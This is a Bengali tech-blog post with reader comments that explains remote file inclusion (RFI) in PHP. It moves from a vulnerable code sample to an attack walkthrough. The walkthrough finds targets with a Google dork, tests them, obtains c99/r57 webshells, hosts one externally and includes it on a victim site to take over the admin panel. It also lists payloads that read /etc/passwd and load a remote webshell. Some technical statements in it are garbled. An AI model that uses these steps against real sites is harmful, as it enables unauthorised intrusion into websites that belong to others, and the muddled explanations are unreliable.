TunerPage
ফলাফল পাওয়া যায়নি
সব ফলাফল দেখুন
  • লগিন করুন
  • রেজিস্টার
  • মুল পাতা
  • বিজ্ঞান
    • প্রযুক্তি
    • রহস্যময় জগত
    • টেকনোলজি
    • সাইন্স ফিকশন
    • কেন কীভাবে?
    • কুইজ
  • মোবাইলিয়
    • অ্যান্ড্রয়েড
  • টিউটোরিয়াল
    • গ্রাফিক্স
    • ওয়েব ডিজাইনিং
    • প্রোগ্রামিং
    • ভিডিও টিউটো
  • টিপস
    • ফেসবুক
    • হ্যাকিং ও ক্রেকিং
    • পিসি ট্রিকস
  • ফ্রিল্যান্সিং
    • ফরেক্স
    • এসইও
    • তথ্য
    • ওয়ার্ডপ্রেস
  • প্রতিবেদন
    • ইন্টারনেট
    • গুগল
    • অনলাইন
  • কম্পিউটার
    • টিপস
    • উইন্ডোজ ৭
    • পিসি গেমস
  • অন্যান্য
    • ই-বুকস
    • মুভি ডাউনলোড
    • এন্টি ভাইরাস
    • সফটওয়্যার
    • ডাউনলোড
    • সাহায্য/জিজ্ঞাসা
    • ইলেক্ট্রনিক্স
  • এক্সক্লুসিভ
    • পেনড্রাইভ
    • হ্যাকিং
    • উইন্ডোজ
  • মুল পাতা
  • বিজ্ঞান
    • প্রযুক্তি
    • রহস্যময় জগত
    • টেকনোলজি
    • সাইন্স ফিকশন
    • কেন কীভাবে?
    • কুইজ
  • মোবাইলিয়
    • অ্যান্ড্রয়েড
  • টিউটোরিয়াল
    • গ্রাফিক্স
    • ওয়েব ডিজাইনিং
    • প্রোগ্রামিং
    • ভিডিও টিউটো
  • টিপস
    • ফেসবুক
    • হ্যাকিং ও ক্রেকিং
    • পিসি ট্রিকস
  • ফ্রিল্যান্সিং
    • ফরেক্স
    • এসইও
    • তথ্য
    • ওয়ার্ডপ্রেস
  • প্রতিবেদন
    • ইন্টারনেট
    • গুগল
    • অনলাইন
  • কম্পিউটার
    • টিপস
    • উইন্ডোজ ৭
    • পিসি গেমস
  • অন্যান্য
    • ই-বুকস
    • মুভি ডাউনলোড
    • এন্টি ভাইরাস
    • সফটওয়্যার
    • ডাউনলোড
    • সাহায্য/জিজ্ঞাসা
    • ইলেক্ট্রনিক্স
  • এক্সক্লুসিভ
    • পেনড্রাইভ
    • হ্যাকিং
    • উইন্ডোজ
ফলাফল পাওয়া যায়নি
সব ফলাফল দেখুন
TunerPage
ফলাফল পাওয়া যায়নি
সব ফলাফল দেখুন
মুল পাতা হ্যাকিং

আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???

rashed rahul rashed rahul
০১/০৪/২০১৩
in হ্যাকিং
0 0
4
আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ??? আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???
1
বার শেয়ার হয়েছে
11
বার দেখা হয়েছে
ফেসবুক শেয়ার করুনটুইটার শেয়ার করুন

ওয়েবসাইট এর নিরাপত্তার জন্য তাদের নির্বাহীরা অনেক কর্মপন্থা  নির্ধারণ করে থাকেন । কিন্তু ওয়েবসাইট এর সব বাগ ঠিক করা যায়। এর থেকে বড় প্রশ্ন হচ্ছে ওয়েবসাইটগুলো কি পুরোপুরি নিরাপদ?
আর ওয়েবসাইট গুলো এই দুর্বল নিরাপত্তা কে ধরাশায়ী করার একটি উপায় হল রিমোট ফাইল ইঙ্কলাসন (RFI)। আজকে এই পোস্ট এ আলোচনা করব এটি কি এবং এটি দিয়ে কিভাবে কাজ করতে হয় ।

Remote File Inclusion
Remote File Inclusion (RFI)
    হল এক ধরনের vulnerability বা দুর্বলতা । যা বেশিরভাগ ওয়েবসাইট এ খুজে পাওয়া যায় ।
এই ধরনের ত্রুটি একজন হ্যাকার কে সুযোগ করে দেয় রিমোট ফাইল সাধারনত স্ক্রিপ্ট এর মাধ্যমে ওয়েবসাইট এ প্রবেশ করার । সাধারন ভাবে এ ধরনের ত্রুটি অ্যাডমিনদের দ্বারা সৃষ্টি হয় । কারন তারা কোন তথ্য ওয়েবসাইট এ দেয়ার পর সেটির বাগ সম্পর্কে সচেতন থাকেন না। রিমোটে ফাইল এক্সটেনশন নিচের  পদ্ধতি গুলর মাধ্যমে হয়ে থাকে। অনেকে এগুলো কে আলাদা বলে গণ্য করে থাকেন কিন্তু এগুলো প্রকারভেদ হিসেবে RFI এর অংশ । এগুলো হল

Code execution on the web server
cross site scripting (XSS).
Denial of Service (DoS)
Data Theft/Manipulation

উদাহরণ
ধরুন আপনি আপনার ওয়েবসাইট এ কোন php স্ক্রিপ্ট এর কন্টেন্ট দিলেন । php তে সাধারন ভাবে $_GET, $_POST, $_COOKIE এর মাধ্যমে rfi করা হয় । এখন আপনি যদি স্ক্রিপ্ট এ কোন ভুল করেন তাহলে সেখানে কোন ডাটা টাইপ মিসিং থাকে। আর এর ফলে সেখানে অতিরিক্ত একটি কোড এর লাইন হ্যাকার তৈরি করেন এবং অ্যাডমিন প্যানেল এ প্রবেশ করেন ।
php তে সাধারনত চার কম্যান্ড ব্যবহার হয় । এগুলো হল SEND,GET POST RECIVE
নিচের এই স্ক্রিপ্ট এর কথাই ধরুন। এখানে একটি ফাইল টাইপ কে রিকোয়েস্ট করা হয়েছে ।

<?php
   if (isset( $_GET['COLOR'] ) ){
      include( $_GET['COLOR'] . '.php' );
   }
?>
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

এখন আপনি ওয়েবসাইট এ সুধু দেখেন get ,COLOR, blue এগুলো । কিন্তু যে কেউ COLOR parameter ব্যবহার করে এখানে অতিরিক্ত একটি ফাইল ঢুকিয়ে দিতে পারেন । কয়েকটি উদাহরণ দেই ।
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
এই কোড এর মাধ্যমে একটি ফাইল প্রবেশ করে যাতে malicious কনটেন্ট থাকে ।
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
এই কোড ব্যবহার করে হ্যাকার তার পূর্ব তৈরিকৃত নকল ওয়েবসাইট এ ভিসিটর দের নিয়ে যায় ।
/vulnerable.php?COLOR=/etc/passwd%00
এই ধরনের কোড নিয়ে যায় পাসওয়ার্ড ফাইল এ।
এই জিনিশ গুলো খুব কঠিন মনে হলে আমি আপনাদের এই ধরনের অ্যাটাক করার একটি সহজ পদ্ধতি সেখাব ।
Untitled-1.psd আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???

Let the Hacking Begin

 

~Vulnerability
Remote File inclusion এর  vulnerability সাধারন ভাবে সেসব ওয়েবসাইট এ পাওয়া যায়। যেগুলোর লিঙ্ক নিচের মত হয়ে থাকে
Www.Targetxyz.com/index.php?page=Anything
এ ধরনের সাইট খুযে পেতে চাইলে গুগল এ যেয়ে লিখুন “inurl:index.php?page=” । এটি সেই পেজ গুলো দেখাবে index.php?page= আছে । যে কোন একটি পেজ বাছাই করতে পারেন
এখন আপনাকে পরীক্ষা করতে হবে এটি RFI এর উপযোগী কিনা?
হ্যাকার রা এটি পরীক্ষা করতে সাধারনত নিচের কম্যান্ড ব্যবহার করেন ।
Www.Targetxyz.com/index.php?page=http://www.google.com
এখন ওয়েবসাইট টি যদি vulnerble হয় তাহলে গুগল এর এমন একটি পেজ দেখাবে । যেন একটি ওয়েবসাইট এর মধ্যে আরেকটি ওয়েবসাইট।

rfi আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???এখন এটি পাওয়ার পর হ্যাকার রা শেল ব্যবহার করেন। শেল ব্যবহার করে তারা কন্ট্রোল প্যানেল এ প্রবেশ করার চেষ্টা করে থাকেন ।
এখন আপনার প্রস্ন হতে পারে আমি শেল পাব কোথায় । কিছ শেল আছে যার মাধ্যমে যে কোন ওয়েবসাইট এর কন্ট্রোল প্যানেল এর পুরো অ্যাক্সেস পাওয়া যায় । যেমন
c99  ,   r57  ,   b0yzone  , j32 ”   ইত্যাদি ।
আপনি এগুলো গুগল এ খুযতে পারেন “inurl:c99.txt”  or “inurl:r57.txt” লিখে সার্চ করুন এবং Save them as Shell.php।
আচ্ছা ধরুন আমার শেল হল
http://h1.kripway.com/rashdrhul/c99shell.ph
এখন আপনার শেল টি ফ্রী হস্টিং সাইট যেমন 110mb.com, filehoster.com এসব সাইট এ আপলোড করুন ।
এখন আপনার শেল আপলোড হলে সেটি এবার আপনি যে সাইট হ্যাক করছেন সেখানে exicute করে দিন । আমার শেল ঐ সাইট এর হিসেবে হবে

  Www.Targetxyz.com/index.php?page=http://h1.kripway.com/rashdrhul/c99shell.php?

 

এরপর অ্যাডমিন প্যানেল এর কন্ট্রোল আপনার কাছে চলে আসবে । যত সহজ করে বলছি সেটা এমন নাও হতে পারে । কাজ না করলে বিভিন্ন ধরনের শেল দিয়ে ট্রাই করতে হয় ।

 

শেষ কথা
এই পর্যন্তই ছিল । টিউন সম্পর্কে মতামত দেবেন ।
এরকম অনেক কিছু পাবেন > http://www.facebook.com/CY133R এ
আর আমার সাথে যুক্ত হতে পারেন > http://www.facebook.com/techfreak.unknown এ



ট্যাগ সমূহ: dos attackhackrfisecurityvulnerblewifi
পূর্ববর্তী টিউন

গেমস জোন :: The King of Fighters 2006 (3D)

পরবর্তী টিউন

আপনার ওয়েব সাইটের মার্জিত ভিজিটর বৃদ্ধি করুণ ৫টি সেরা questions and answer সাইটের মাধ্যমে।

rashed rahul

rashed rahul

নেকড়ের মত হানা দিয়ে আমি তোমাদের শিবিরে আসি... কারন আমি কেড়ে নিতে যানি তোমাদের মুখের হাসি ...

এই সম্পর্কিত আরোটিউন সমূহ

সবচেয়ে দ্রুতগতির ওয়াই-ফাই আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???
ডাউনলোড

সবচেয়ে দ্রুতগতির ওয়াই-ফাই

২৩/১২/২০১৮
19
ইন্টারনেট ছাড়াই যে কোন ওয়েব সাইট চালান আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???
এন্ড্রয়েড

ইন্টারনেট ছাড়াই যে কোন ওয়েব সাইট চালান

৩১/০৫/২০১৭
10
কালি লিনাক্স অপারেটিং সিস্টেমঃ হ্যাকিং ও পেনেট্রেশন টেস্টিং এর আদ্যোপান্ত আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???
হ্যাকিং / ক্রেকিং ও এন্টি হ্যাকিং

কালি লিনাক্স অপারেটিং সিস্টেমঃ হ্যাকিং ও পেনেট্রেশন টেস্টিং এর আদ্যোপান্ত

০৪/০৪/২০১৭
13
ওয়াইফাই হ্যাকিং ইন একশন!!! (wifi hacking full series) আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???
হ্যাকিং / ক্রেকিং ও এন্টি হ্যাকিং

ওয়াইফাই হ্যাকিং ইন একশন!!! (wifi hacking full series)

০৬/০৫/২০১৬
10
২০৯৮ সালের দিকে ফেসবুকে জীবিতদের চেয়ে মৃতদের অ্যাকাউন্ট বেশি থাকবে আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???
ফেসবুক

সর্বউচ্চ সুরক্ষিত রাখুন আপনার ফেসবুক অ্যাকাউন্ট !!!!! (ভিডিও টিউটোরিয়াল)

১৮/০৪/২০১৬
10
ওয়াইফাই অ্যাডাপ্টার ছাড়া পিসিতে( ডেস্কটপে) ওয়াইফাই দিয়ে ইন্টারনেট ব্যাবহার করুন খুব সহজে !!!!!!!! আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???
ইন্টারনেট

ওয়াইফাই অ্যাডাপ্টার ছাড়া পিসিতে( ডেস্কটপে) ওয়াইফাই দিয়ে ইন্টারনেট ব্যাবহার করুন খুব সহজে !!!!!!!!

১৭/১২/২০১৫
12
পরবর্তী টিউন
আপনার ওয়েব সাইটের মার্জিত ভিজিটর বৃদ্ধি করুণ ৫টি সেরা questions and answer সাইটের মাধ্যমে। আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???

আপনার ওয়েব সাইটের মার্জিত ভিজিটর বৃদ্ধি করুণ ৫টি সেরা questions and answer সাইটের মাধ্যমে।

মন্তব্যগুলো ৪

  1. মহসিনা আরিফা says:
    8 years আগে

    khub i sundor post — niyomito post korun —

    Reply
  2. একুশে says:
    8 years আগে

    দারুন জিনিস শিখলাম। ধন্যবাদ

    Reply
  3. ফারুক আহমেদ says:
    8 years আগে

    আপনার টিউন গুলো অনেক সুন্দর। ধন্যবাদ।

    Reply
  4. রনি says:
    8 years আগে

    ভালো লাগে এত সুন্দর মান সম্মত পোস্ট চোখে পরলে। ধন্যবাদ। আমার পোস্ট গুলো দেখুন ভালো লাগলে দয়া করে মন্তব্য করুণ। ধন্যবাদ।

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

ফলাফল পাওয়া যায়নি
সব ফলাফল দেখুন
TunerPage

আমার দেশ আমার গর্ব। আমার ভাষা আমার অহংকার । বাংলাদেশের প্রতিটি মানুষ টেকনোলজি বিষয়ে আরো জানুক নিজের বাংলা ভাষায় এবং তাদের জানার পিপাসা আরো বাড়ুক। এই উদ্দেশ্যেই টিউনারপেজের যাত্রা শুরু ২০১১ সালের ২১শে ফেব্রুয়ারি তে!

টিউনারপেজ এক্সক্লুসিভ টিউন

প্রয়োজনীয় কিছু বিজনেস সফটওয়্যার (অ্যান্ড্রয়েডের জন্য) আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???

প্রয়োজনীয় কিছু বিজনেস সফটওয়্যার (অ্যান্ড্রয়েডের জন্য)

১৮/০৩/২০১৩
10

নিয়ে নিন Z luncher আর আপনার Android কে বানিয়া নিন গ্রেট লুকিং

Windows 8 Teblate Pc বের হওয়ার আগেই দেখে নেই পিসি গুলো কিরকম দেখতে হবে ।

দোকানে ঔষধ কিনতে গিয়ে ঠকার আগে Android ডিভাইসের জন্য এই সফটওয়্যারটি দিয়ে 33,000+ ঔষধের খোঁজখবর নিতে পারবেন

TeraCopy Pro 2011

ডাউনলোড করুন Adove Photoshop CC মিডিয়াফায়ার লিঙ্ক

Categories

  • অন্যান্য
  • ই-বুকস
  • ইন্টারনেট
  • ইলেক্ট্রনিক্স
  • উইন্ডোজ
  • উইন্ডোজ ৭
  • এক্সক্লুসিভ পোস্ট
  • এন্টি ভাইরাস
  • এন্ড্রয়েড
  • ওয়ার্ডপ্রেস
  • ওয়েব ডিজাইনিং
  • কম্পিউটার
  • কী কেন কীভাবে
  • কুইজ
  • গুগল
  • গ্রাফিক্স ডিজাইন
  • টিউটোরিয়াল
  • টিপস এন্ড ট্রিকস
  • টেক আপডেট
  • ডাউনলোড
  • নোটিশ-বোর্ড
  • পিসি গেমস
  • পেনড্রাইভ
  • প্রতিবেদন
  • প্রোগ্রামিং
  • ফরেক্স
  • ফেসবুক
  • ফ্রিল্যান্সিং
  • বিজ্ঞান ও প্রযুক্তি
  • বিজ্ঞাপন
  • ভিডিও টিউটোরিয়াল
  • মাসিক টিউনারপেজ
  • মুভি ডাউনলোড
  • মোবাইলীয়
  • রহস্যময় জগত
  • রিভিউ
  • সফটওয়্যার
  • সাইন্স ফিকশন
  • সাহায্য/জিজ্ঞাসা
  • হ্যাকিং
  • হ্যাকিং / ক্রেকিং ও এন্টি হ্যাকিং
  • SEO-এসইও

TunerPage Footer

আমার দেশ আমার গর্ব। আমার ভাষা আমার অহংকার । বাংলাদেশের প্রতিটি মানুষ টেকনোলজি বিষয়ে আরো জানুক নিজের বাংলা ভাষায় এবং তাদের জানার পিপাসা আরো বাড়ুক। এই উদ্দেশ্যেই টিউনারপেজের যাত্রা শুরু ২০১১ সালের ২১শে ফেব্রুয়ারি তে।

Categories

  • অন্যান্য
  • ই-বুকস
  • ইন্টারনেট
  • ইলেক্ট্রনিক্স
  • উইন্ডোজ
  • উইন্ডোজ ৭
  • এক্সক্লুসিভ পোস্ট
  • এন্টি ভাইরাস
  • এন্ড্রয়েড
  • ওয়ার্ডপ্রেস
  • ওয়েব ডিজাইনিং
  • কম্পিউটার
  • কী কেন কীভাবে
  • কুইজ
  • গুগল
  • গ্রাফিক্স ডিজাইন
  • টিউটোরিয়াল
  • টিপস এন্ড ট্রিকস
  • টেক আপডেট
  • ডাউনলোড
  • নোটিশ-বোর্ড
  • পিসি গেমস
  • পেনড্রাইভ
  • প্রতিবেদন
  • প্রোগ্রামিং
  • ফরেক্স
  • ফেসবুক
  • ফ্রিল্যান্সিং
  • বিজ্ঞান ও প্রযুক্তি
  • বিজ্ঞাপন
  • ভিডিও টিউটোরিয়াল
  • মাসিক টিউনারপেজ
  • মুভি ডাউনলোড
  • মোবাইলীয়
  • রহস্যময় জগত
  • রিভিউ
  • সফটওয়্যার
  • সাইন্স ফিকশন
  • সাহায্য/জিজ্ঞাসা
  • হ্যাকিং
  • হ্যাকিং / ক্রেকিং ও এন্টি হ্যাকিং
  • SEO-এসইও

ই-মেইল চিঠি

কপিরাইট © টিউনারপেজ.কম ২০১১ – ২০২০ | অল রাইট রিজার্ভড

  • ফেসবুক পেজ
  • ফেসবুক গ্রুপ
  • আমাদের কথা
  • মতামত দিন
  • ব্লগ বিধি
ফলাফল পাওয়া যায়নি
সব ফলাফল দেখুন
  • মুল পাতা
  • বিজ্ঞান
    • প্রযুক্তি
    • রহস্যময় জগত
    • টেকনোলজি
    • সাইন্স ফিকশন
    • কেন কীভাবে?
    • কুইজ
  • মোবাইলিয়
    • অ্যান্ড্রয়েড
  • টিউটোরিয়াল
    • গ্রাফিক্স
    • ওয়েব ডিজাইনিং
    • প্রোগ্রামিং
    • ভিডিও টিউটো
  • টিপস
    • ফেসবুক
    • হ্যাকিং ও ক্রেকিং
    • পিসি ট্রিকস
  • ফ্রিল্যান্সিং
    • ফরেক্স
    • এসইও
    • তথ্য
    • ওয়ার্ডপ্রেস
  • প্রতিবেদন
    • ইন্টারনেট
    • গুগল
    • অনলাইন
  • কম্পিউটার
    • টিপস
    • উইন্ডোজ ৭
    • পিসি গেমস
  • অন্যান্য
    • ই-বুকস
    • মুভি ডাউনলোড
    • এন্টি ভাইরাস
    • সফটওয়্যার
    • ডাউনলোড
    • সাহায্য/জিজ্ঞাসা
    • ইলেক্ট্রনিক্স
  • এক্সক্লুসিভ
    • পেনড্রাইভ
    • হ্যাকিং
    • উইন্ডোজ
  • লগিন করুন
  • রেজিস্টার

কপিরাইট © টিউনারপেজ.কম ২০১১ – ২০২০ | অল রাইট রিজার্ভড

ওহে, আপনাকে স্বাগতম!

ফেসবুকের মাধ্যমে লগিন
অথবা

আপনার একাউন্ট -এ লগিন করুন

পাসওয়ার্ড ভুলে গেছেন? রেজিস্টার

একাউন্ট নেই? নতুন একাউন্ট খুলুন

ফেইসবুকের মাধ্যমে রেজিস্টার
অথবা

রেজিস্টার করতে নিচের ফর্ম পূরণ করুন

সব ফর্ম পূরণ করা আবশ্যক লগিন করুন

পাসওয়ার্ড রিকোভার করুন

পাসওয়ার্ড রিকোভারের জন্য আপনার ইউজার নেম অথবা ই-মেইল লিখুন

লগিন করুন